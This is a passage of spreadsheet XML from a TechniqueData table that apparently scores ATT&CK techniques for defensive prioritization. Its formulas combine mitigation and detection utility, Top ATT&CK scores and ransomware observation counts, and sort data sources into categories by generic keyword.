      <c r="L43" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M43" s="37">
        <v>0.77288599999999996</v>
      </c>
      <c r="N43" s="56">
        <v>0</v>
      </c>
      <c r="O43" s="56">
        <v>83</v>
      </c>
      <c r="P43" s="56">
        <v>7</v>
      </c>
      <c r="Q43" s="56">
        <v>8</v>
      </c>
      <c r="R43" s="57" t="s">
        <v>213</v>
      </c>
      <c r="S43" s="57">
        <v>5</v>
      </c>
      <c r="T43" s="57" t="s">
        <v>214</v>
      </c>
      <c r="U43" s="57">
        <v>6</v>
      </c>
      <c r="V43" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.5714285714285714</v>
      </c>
      <c r="W43" s="37">
        <v>11</v>
      </c>
      <c r="X43" s="37">
        <v>0.2</v>
      </c>
      <c r="Y43" s="37">
        <v>0.2</v>
      </c>
      <c r="Z43" s="37">
        <v>98</v>
      </c>
      <c r="AA43" s="37">
        <v>0.98</v>
      </c>
      <c r="AB43" s="37">
        <v>0.98</v>
      </c>
      <c r="AC43" s="37"/>
      <c r="AD43" s="50" t="s">
        <v>215</v>
      </c>
      <c r="AE43" s="37" t="str" cm="1">
        <f t="array" ref="AE43">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD43)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF43" s="37">
        <v>39</v>
      </c>
      <c r="AG43" s="37" t="str" cm="1">
        <f t="array" ref="AG43">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD43)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH43" s="37">
        <v>39</v>
      </c>
      <c r="AI43" s="37" t="str" cm="1">
        <f t="array" ref="AI43">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD43)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ43" s="37">
        <v>39</v>
      </c>
      <c r="AK43" s="37" t="str" cm="1">
        <f t="array" ref="AK43">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD43)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL43" s="37">
        <v>39</v>
      </c>
      <c r="AM43" s="37" t="str" cm="1">
        <f t="array" ref="AM43">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD43)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN43" s="37">
        <v>0</v>
      </c>
      <c r="AO43" s="37">
        <v>10</v>
      </c>
      <c r="AP43" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.6333333333333333</v>
      </c>
      <c r="AQ43" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>78.202462571428569</v>
      </c>
      <c r="AR43" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS43" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.47619047619047616</v>
      </c>
      <c r="AT43" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.47619047619047616</v>
      </c>
      <c r="AU4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18.857729183673467</v>
      </c>
    </row>
    <row r="44" spans="1:47" ht="34">
      <c r="A44" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="B44" s="37">
        <f t="shared" si="0"/>
        <v>18.400000000000002</v>
      </c>
      <c r="C44" s="37" t="s">
        <v>216</v>
      </c>
      <c r="D44" s="50" t="s">
        <v>212</v>
      </c>
      <c r="E44" s="37" t="s">
        <v>217</v>
      </c>
      <c r="F44" s="37">
        <v>1</v>
      </c>
      <c r="G44" s="37">
        <v>1</v>
      </c>
      <c r="H44" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I44" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J44" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K44" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L44" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M44" s="37">
        <v>0</v>
      </c>
      <c r="N44" s="56">
        <v>0</v>
      </c>
      <c r="O44" s="56">
        <v>3</v>
      </c>
      <c r="P44" s="56">
        <v>0</v>
      </c>
      <c r="Q44" s="56">
        <v>0</v>
      </c>
      <c r="R44" s="57"/>
      <c r="S44" s="57">
        <v>0</v>
      </c>
      <c r="T44" s="57"/>
      <c r="U44" s="57">
        <v>0</v>
      </c>
      <c r="V44" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>1.4285714285714284E-2</v>
      </c>
      <c r="W44" s="37">
        <v>0</v>
      </c>
      <c r="X44" s="37">
        <v>0</v>
      </c>
      <c r="Y44" s="37">
        <v>0</v>
      </c>
      <c r="Z44" s="37">
        <v>3</v>
      </c>
      <c r="AA44" s="37">
        <v>0.03</v>
      </c>
      <c r="AB44" s="37">
        <v>0.03</v>
      </c>
      <c r="AC44" s="37"/>
      <c r="AD44" s="50" t="s">
        <v>218</v>
      </c>
      <c r="AE44" s="37" t="str" cm="1">
        <f t="array" ref="AE44">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD44)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF44" s="37">
        <v>40</v>
      </c>
      <c r="AG44" s="37" t="str" cm="1">
        <f t="array" ref="AG44">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD44)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH44" s="37">
        <v>40</v>
      </c>
      <c r="AI44" s="37" t="str" cm="1">
        <f t="array" ref="AI44">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD44)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ44" s="37">
        <v>40</v>
      </c>
      <c r="AK44" s="37" t="str" cm="1">
        <f t="array" ref="AK44">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD44)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL44" s="37">
        <v>40</v>
      </c>
      <c r="AM44" s="37" t="str" cm="1">
        <f t="array" ref="AM44">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD44)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN44" s="37">
        <v>0</v>
      </c>
      <c r="AO44" s="37">
        <v>3</v>
      </c>
      <c r="AP44" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="AQ44" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>6.1333333333333337</v>
      </c>
      <c r="AR44" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS44" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AT44" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AU4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0.50952380952380949</v>
      </c>
    </row>
    <row r="45" spans="1:47" ht="34">
      <c r="A45" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.5</v>
      </c>
      <c r="B45" s="37">
        <f t="shared" si="0"/>
        <v>31.428540000000002</v>
      </c>
      <c r="C45" s="37" t="s">
        <v>219</v>
      </c>
      <c r="D45" s="50" t="s">
        <v>212</v>
      </c>
      <c r="E45" s="37" t="s">
        <v>220</v>
      </c>
      <c r="F45" s="37">
        <v>1</v>
      </c>
      <c r="G45" s="37">
        <v>1</v>
      </c>
      <c r="H45" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I45" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J45" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K45" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L45" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M45" s="37">
        <v>0</v>
      </c>
      <c r="N45" s="56">
        <v>0</v>
      </c>
      <c r="O45" s="56">
        <v>1</v>
      </c>
      <c r="P45" s="56">
        <v>0</v>
      </c>
      <c r="Q45" s="56">
        <v>0</v>
      </c>
      <c r="R45" s="57" t="s">
        <v>213</v>
      </c>
      <c r="S45" s="57">
        <v>5</v>
      </c>
      <c r="T45" s="57" t="s">
        <v>221</v>
      </c>
      <c r="U45" s="57">
        <v>4</v>
      </c>
      <c r="V45" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>9.0476000000000001E-2</v>
      </c>
      <c r="W45" s="37">
        <v>9</v>
      </c>
      <c r="X45" s="37">
        <v>0.163636</v>
      </c>
      <c r="Y45" s="37">
        <v>0.163636</v>
      </c>
      <c r="Z45" s="37">
        <v>1</v>
      </c>
      <c r="AA45" s="37">
        <v>0.01</v>
      </c>
      <c r="AB45" s="37">
        <v>0.01</v>
      </c>
      <c r="AC45" s="37"/>
      <c r="AD45" s="50" t="s">
        <v>218</v>
      </c>
      <c r="AE45" s="37" t="str" cm="1">
        <f t="array" ref="AE45">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD45)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF45" s="37">
        <v>41</v>
      </c>
      <c r="AG45" s="37" t="str" cm="1">
        <f t="array" ref="AG45">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD45)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH45" s="37">
        <v>41</v>
      </c>
      <c r="AI45" s="37" t="str" cm="1">
        <f t="array" ref="AI45">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD45)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ45" s="37">
        <v>41</v>
      </c>
      <c r="AK45" s="37" t="str" cm="1">
        <f t="array" ref="AK45">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD45)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL45" s="37">
        <v>41</v>
      </c>
      <c r="AM45" s="37" t="str" cm="1">
        <f t="array" ref="AM45">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD45)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN45" s="37">
        <v>0</v>
      </c>
      <c r="AO45" s="37">
        <v>6</v>
      </c>
      <c r="AP45" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.5</v>
      </c>
      <c r="AQ45" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>10.476180000000001</v>
      </c>
      <c r="AR45" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS45" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.2857142857142857</v>
      </c>
      <c r="AT45" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.2857142857142857</v>
      </c>
      <c r="AU4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1.6394542857142855</v>
      </c>
    </row>
    <row r="46" spans="1:47" ht="34">
      <c r="A46" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B46" s="37">
        <f t="shared" si="0"/>
        <v>20.923809523809524</v>
      </c>
      <c r="C46" s="37" t="s">
        <v>222</v>
      </c>
      <c r="D46" s="50" t="s">
        <v>212</v>
      </c>
      <c r="E46" s="37" t="s">
        <v>79</v>
      </c>
      <c r="F46" s="37">
        <v>1</v>
      </c>
      <c r="G46" s="37">
        <v>1</v>
      </c>
      <c r="H46" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I46" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J46" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K46" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L46" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M46" s="37">
        <v>0</v>
      </c>
      <c r="N46" s="56">
        <v>0</v>
      </c>
      <c r="O46" s="56">
        <v>5</v>
      </c>
      <c r="P46" s="56">
        <v>0</v>
      </c>
      <c r="Q46" s="56">
        <v>0</v>
      </c>
      <c r="R46" s="57"/>
      <c r="S46" s="57">
        <v>0</v>
      </c>
      <c r="T46" s="57"/>
      <c r="U46" s="57">
        <v>0</v>
      </c>
      <c r="V46" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>2.3809523809523808E-2</v>
      </c>
      <c r="W46" s="37">
        <v>0</v>
      </c>
      <c r="X46" s="37">
        <v>0</v>
      </c>
      <c r="Y46" s="37">
        <v>0</v>
      </c>
      <c r="Z46" s="37">
        <v>5</v>
      </c>
      <c r="AA46" s="37">
        <v>0.05</v>
      </c>
      <c r="AB46" s="37">
        <v>0.05</v>
      </c>
      <c r="AC46" s="37"/>
      <c r="AD46" s="50" t="s">
        <v>218</v>
      </c>
      <c r="AE46" s="37" t="str" cm="1">
        <f t="array" ref="AE46">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD46)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF46" s="37">
        <v>42</v>
      </c>
      <c r="AG46" s="37" t="str" cm="1">
        <f t="array" ref="AG46">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD46)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH46" s="37">
        <v>42</v>
      </c>
      <c r="AI46" s="37" t="str" cm="1">
        <f t="array" ref="AI46">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD46)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ46" s="37">
        <v>42</v>
      </c>
      <c r="AK46" s="37" t="str" cm="1">
        <f t="array" ref="AK46">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD46)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL46" s="37">
        <v>42</v>
      </c>
      <c r="AM46" s="37" t="str" cm="1">
        <f t="array" ref="AM46">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD46)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN46" s="37">
        <v>0</v>
      </c>
      <c r="AO46" s="37">
        <v>2</v>
      </c>
      <c r="AP46" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ46" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>6.9746031746031747</v>
      </c>
      <c r="AR46" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS46" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT46" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU4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0.37974300831443686</v>
      </c>
    </row>
    <row r="47" spans="1:47" ht="34">
      <c r="A47" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B47" s="37">
        <f t="shared" si="0"/>
        <v>23.890476190476193</v>
      </c>
      <c r="C47" s="37" t="s">
        <v>223</v>
      </c>
      <c r="D47" s="50" t="s">
        <v>212</v>
      </c>
      <c r="E47" s="37" t="s">
        <v>224</v>
      </c>
      <c r="F47" s="37">
        <v>1</v>
      </c>
      <c r="G47" s="37">
        <v>1</v>
      </c>
      <c r="H47" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I47" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J47" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K47" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L47" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M47" s="37">
        <v>0</v>
      </c>
      <c r="N47" s="56">
        <v>0</v>
      </c>
      <c r="O47" s="56">
        <v>5</v>
      </c>
      <c r="P47" s="56">
        <v>2</v>
      </c>
      <c r="Q47" s="56">
        <v>1</v>
      </c>
      <c r="R47" s="57"/>
      <c r="S47" s="57">
        <v>0</v>
      </c>
      <c r="T47" s="57"/>
      <c r="U47" s="57">
        <v>0</v>
      </c>
      <c r="V47" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>3.8095238095238092E-2</v>
      </c>
      <c r="W47" s="37">
        <v>0</v>
      </c>
      <c r="X47" s="37">
        <v>0</v>
      </c>
      <c r="Y47" s="37">
        <v>0</v>
      </c>
      <c r="Z47" s="37">
        <v>8</v>
      </c>
      <c r="AA47" s="37">
        <v>0.08</v>
      </c>
      <c r="AB47" s="37">
        <v>0.08</v>
      </c>
      <c r="AC47" s="37"/>
      <c r="AD47" s="50" t="s">
        <v>210</v>
      </c>
      <c r="AE47" s="37" t="str" cm="1">
        <f t="array" ref="AE47">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD47)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF47" s="37">
        <v>43</v>
      </c>
      <c r="AG47" s="37" t="str" cm="1">
        <f t="array" ref="AG47">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD47)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH47" s="37">
        <v>43</v>
      </c>
      <c r="AI47" s="37" t="str" cm="1">
        <f t="array" ref="AI47">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD47)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ47" s="37">
        <v>43</v>
      </c>
      <c r="AK47" s="37" t="str" cm="1">
        <f t="array" ref="AK47">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD47)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL47" s="37">
        <v>43</v>
      </c>
      <c r="AM47" s="37" t="str" cm="1">
        <f t="array" ref="AM47">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD47)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN47" s="37">
        <v>0</v>
      </c>
      <c r="AO47" s="37">
        <v>1</v>
      </c>
      <c r="AP47" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ47" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>7.9634920634920645</v>
      </c>
      <c r="AR47" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS47" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT47" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU4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0.21341647770219202</v>
      </c>
    </row>
    <row r="48" spans="1:47" ht="34">
      <c r="A48" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B48" s="37">
        <f t="shared" si="0"/>
        <v>22.757142857142856</v>
      </c>
      <c r="C48" s="37" t="s">
        <v>225</v>
      </c>
      <c r="D48" s="50" t="s">
        <v>212</v>
      </c>
      <c r="E48" s="37" t="s">
        <v>226</v>
      </c>
      <c r="F48" s="37">
        <v>1</v>
      </c>
      <c r="G48" s="37">
        <v>1</v>
      </c>
      <c r="H48" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I48" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J48" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K48" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L48" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M48" s="37">
        <v>0</v>
      </c>
      <c r="N48" s="56">
        <v>0</v>
      </c>
      <c r="O48" s="56">
        <v>4</v>
      </c>
      <c r="P48" s="56">
        <v>0</v>
      </c>
      <c r="Q48" s="56">
        <v>2</v>
      </c>
      <c r="R48" s="57"/>
      <c r="S48" s="57">
        <v>0</v>
      </c>
      <c r="T48" s="57"/>
      <c r="U48" s="57">
        <v>0</v>
      </c>
      <c r="V48" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>2.8571428571428567E-2</v>
      </c>
      <c r="W48" s="37">
        <v>0</v>
      </c>
      <c r="X48" s="37">
        <v>0</v>
      </c>
      <c r="Y48" s="37">
        <v>0</v>
      </c>
      <c r="Z48" s="37">
        <v>6</v>
      </c>
